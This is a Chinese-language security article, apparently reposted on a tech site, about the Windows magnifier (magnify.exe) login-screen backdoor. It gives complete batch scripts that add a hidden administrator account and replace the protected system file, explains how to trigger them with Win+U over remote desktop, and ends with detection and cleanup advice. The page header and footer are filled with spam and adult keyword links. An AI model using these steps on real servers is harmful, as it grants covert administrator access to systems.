成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

WINDOWS系統后門實例二 圖

安全 網站安全
針對Windows系統的后門是比較多的,本文主要向大家介紹了比較危險的后門即放大鏡程序,希望大家能夠有所收獲。

放大鏡程序,最狡猾的后門

放大鏡程序magnify.exe)是Windows 2000/XP/2003系統集成的一個小工具,它是為方便視力障礙用戶而設計的。在用戶登錄系統前可以通過“Win+U”組合鍵調用該工具,因此攻擊者就用精心構造的magnify.exe同名文件替換放大鏡程序,從而達到控制服務器的目的。

通常情況下,攻擊者通過構造的magnify.exe程序創建一個管理員用戶,然后登錄系統。當然有的時候他們也會通過其直接調用命令提示符(cmd.exe)或者系統shell(explorer.exe)。需要說明的是,這樣調用的程序都是system權限,即系統最高權限。不過,以防萬一當管理員在運行放大鏡程序時發現破綻,攻擊者一般通過該構造程序完成所需的操作后,最后會運行真正的放大鏡程序,以蒙騙管理員。其利用的方法是:

(1)構造批處理腳本

  1. @echo off  
  2.  
  3. net user gslw$ test168 /add  
  4.  
  5. net localgroup administrators gslw$ /add  
  6.  
  7. %Windir%\system32\nagnify.exe  
  8.  
  9. exit 

 

將上面的腳本保存為magnify.bat,其作用是創建一個密碼為test168的管理員用戶gslw$,最后運行改名后的放大鏡程序nagnify.exe。(圖2)

(2)文件格式轉換

因為批處理文件magnify.bat的后綴是bat,必須要將其轉換為同名的exe文件才可以通過組合鍵Win+U調用。攻擊者一般可以利用WinRar構造一個自動解壓的exe壓縮文件,當然也可以利用bat2com、com2exe進行文件格式的轉換。我們就以后面的方法為例進行演示。

打開命令行,進入bat2com、com2exe工具所在的目錄,然后運行命令“bat2com magnify.bat”將magnify.bat轉換成magnify.com,繼續運行命令“com2exe magnify.com”將magnify.com轉換成magnify.exe,這樣就把批處理文件轉換成和放大鏡程序同名的程序文件。(圖3)

(3)放大鏡文件替換

下面就需要用構造的magnify.exe替換同名的放大鏡程序文件,由于Windows對系統文件的自我保護,因此不能直接替換,不過Windows提供了一個命令replace.exe,通過它我們可以替換系統文件。另外,由于系統文件在%Windir%\system32\dllcache中有備份,為了防止文件替換后又重新還原,所有我們首先要替換該目錄下的magnify.exe文件。假設構造的magnify.exe文件在%Windir%目錄下,我們可以通過一個批處理即可實現文件的替換。

  1. @echo off  
  2.  
  3. copy %Windir%\system32\dllcache\magnify.exe nagnify.exe  
  4.  
  5. copy %Windir%\system32\magnify.exe nagnify.exe  
  6.  
  7. replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache  
  8.  
  9. replace.exe %Windir%\magnify.exe %Windir%\system32  
  10.  
  11. exit 

 

上面批處理的功能是,首先將放大鏡程序備份為nagnify.exe,然后用同名的構造程序將其替換。(圖4)

(4)攻擊利用

當完成上述操作后,一個放大鏡后門就做成了。然后攻擊者通過遠程桌面連接服務器,在登錄界面窗口摁下本地鍵盤的“Win+U”組合鍵,選擇運行其中的“放大鏡”,此刻就在服務器上創建了一個管理員用戶gslw$并打開了放大鏡工具,然后攻擊者就開業通過該帳戶登錄服務器。當然,攻擊者在斷開登錄前會刪除所有與該帳戶相關的信息,以防被管理員發現。(圖5)
 

(5)防范措施

進入%Windir%\system32\查看magnify.exe的文件圖標是否是原來的放大鏡的圖標,如果不是的話極有可能被植入了放大鏡后門。當然,有的時候攻擊者也會將其文件圖標更改為和原放大鏡程序的圖標一樣。此時我們可以查看magnify.exe文件的大小和修改時間,如果這兩樣有一項不符就比較懷疑了。

我們也可以先運行magnify.exe,然后運行lusrmgr.msc查看是否有可疑的用戶。如果確定服務器被放置了放大鏡后門,首先要刪除該文件,然后恢復正常的放大鏡程序。當然,我們也可以做得更徹底一些,用一個無關緊要的程序替換放大鏡程序。甚至我們也可以以其人之道還治其人之身,構造一個magnify.exe,通過其警告攻擊者或者進行入侵監控和取證。

與放大鏡后門類似的還有“粘滯鍵”后門,即按下SHIEF鍵五次可以啟動粘滯鍵功能,其利用和防范措施與放大鏡后門類似,只是將magnify.exe換成了sethc.exe。

【編輯推薦】

  1. 后門木馬隱藏技術分析
  2. WINDOWS系統后門實例一
  3. 如何全面清除計算機電腦病毒
  4. Windows組策略保障共享目錄安全
  5. 安全設置Windows組策略有效阻止黑客

 

責任編輯:佚名 來源: IT專家網
相關推薦

2011-03-31 09:25:13

2011-03-31 08:56:32

2011-03-31 09:25:06

2010-09-13 14:47:58

2010-09-13 15:06:36

2010-09-13 14:57:29

2010-09-13 15:14:03

2010-09-13 15:26:34

2009-07-19 11:13:52

windows后門安全

2013-08-09 09:50:34

2024-08-22 14:05:02

2009-11-25 09:11:30

2009-07-24 18:30:33

2010-09-17 17:10:43

Windows后門

2019-02-26 14:39:20

Windows后門漏洞

2013-11-08 10:08:25

2013-04-12 11:07:01

2010-12-20 09:27:07

2016-12-28 10:04:11

2010-04-14 09:40:05

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 欧美精品在线看 | 国产一区 | www久久久| 日韩欧美三级 | 国产成人精品免费视频大全最热 | 91精品国产综合久久精品 | 一级毛片视频免费观看 | 国产欧美一区二区三区日本久久久 | 超碰8| 亚洲精品天堂 | 午夜资源 | 欧美性网站| 久草视频在线播放 | 成人在线免费电影 | 国产xxx在线观看 | 天堂av中文在线 | 精品一二三区 | 天天色图 | 亚洲精品在线看 | 亚洲免费观看视频 | 久久久精品视 | 奇米影视77 | 男女爱爱福利视频 | 91精品久久久久久久久 | 欧美大片黄| 欧美激情精品久久久久久 | www312aⅴ欧美在线看 | 国产aⅴ精品 | 视频一区二区在线观看 | 国产成人精品一区二区三区 | 日韩一区二区在线视频 | 天天操操操操操 | 精品一二区 | 91影视 | 亚洲a在线观看 | 久久久久国产精品一区二区 | 男人av在线| 91精品在线播放 | 亚洲精品影院 | 一区二区三区免费 | 久久精品视频在线免费观看 |